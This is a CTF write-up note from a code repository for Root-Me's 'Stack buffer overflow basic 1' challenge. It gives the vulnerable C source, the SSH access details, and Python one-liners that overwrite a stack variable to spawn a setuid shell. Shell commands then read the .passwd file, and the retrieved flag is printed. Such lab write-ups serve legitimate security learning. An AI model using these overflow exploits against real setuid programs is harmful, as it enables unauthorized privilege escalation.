tudattr/ctf-notes
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5cd3b5a531f3890b31daac8fa11cb922646caac9
ctf-notes/app-system/elf-x86-stack-buffer-overflow-basic-1/notes.org
Tuan-Dat Tran 5cd3b5a531 feat: app system challenges 
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
2026-03-23 09:19:03 +01:00

2.8 KiB
Raw Blame History

ELF x86 - Stack buffer overflow basic 1

Aufgabe Einstellungen der Umgebung PIE Position Independent Executable pas_valide.svg?1566650180 RelRO Read Only relocations pas_valide.svg?1566650180 NX Non-Executable Stack pas_valide.svg?1566650180 Heap exec Non-Executable Heap pas_valide.svg?1566650180 ASLR Address Space Layout Randomization pas_valide.svg?1566650180 SF Source Fortification pas_valide.svg?1566650180 SRC Zugriff auf den Source code valide.svg?1566650190 Quellcode

    #include <unistd.h>
    #include <sys/types.h>
    #include <stdlib.h>
    #include <stdio.h>

    int main()
    {

      int var;
      int check = 0x04030201;
      char buf[40];

      fgets(buf,45,stdin);

      printf("\n[buf]: %s\n", buf);
      printf("[check] %p\n", check);

      if ((check != 0x04030201) && (check != 0xdeadbeef))
        printf ("\nYou are on the right way!\n");

      if (check == 0xdeadbeef)
       {
         printf("Hell yeah! You win!\nOpening your shell...\n");
         setreuid(geteuid(), geteuid());
         system("/bin/bash");
         printf("Shell closed! Bye.\n");
       }
       return 0;
    }

Zugangsdaten für die Übung Host challenge02.root-me.org Protokoll SSH Port 2222 Zugang per SSH ssh -p 2222 app-systeme-ch13@challenge02.root-me.org Benutzername app-systeme-ch13 Passwort app-systeme-ch13

python3 -c "import sys; sys.stdout.buffer.write(b'A'*(40) + b'\xef\xbe\xad\xde')" | ./ch13

Findings (live target)

  • Remote path: /challenge/app-systeme/ch13
  • Binary: ch13: setuid ELF 32-bit, dynamically linked, not stripped

  • Effective mitigations from runtime check:

    • Partial RELRO
    • No stack canary
    • NX enabled
    • No PIE
    • ASLR OFF (on target host)
  • Vulnerability: fgets(buf,45,stdin) writes up to 44 bytes into char buf[40], overflowing 4 bytes into adjacent check.
  • Target value: overwrite check from 0x04030201 to 0xdeadbeef (little-endian bytes \xef\xbe\xad\xde).

Working exploitation flow

  • Basic trigger (proves control of check):
python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + b'\xef\xbe\xad\xde')" | ./ch13
  • To keep stdin open for the spawned SUID shell, use a pipeline with cat:
(python3 -c "import sys; sys.stdout.buffer.write(b'A'*40+b'\xef\xbe\xad\xde')"; cat) | ./ch13
id
cat .passwd
exit

  • Observed privilege in spawned shell:

    • uid=1213(app-systeme-ch13-cracked)
    • gid=1113(app-systeme-ch13)

  • Retrieved validation password:

    • 1w4ntm0r3pr0np1s

Helper scripts

  • helper_recon.py: SSH recon script (pwd, ls, file, checksec, smoke run).
  • helper_exploit_password.py: SSH interactive exploit script that keeps stdin open and reads .passwd.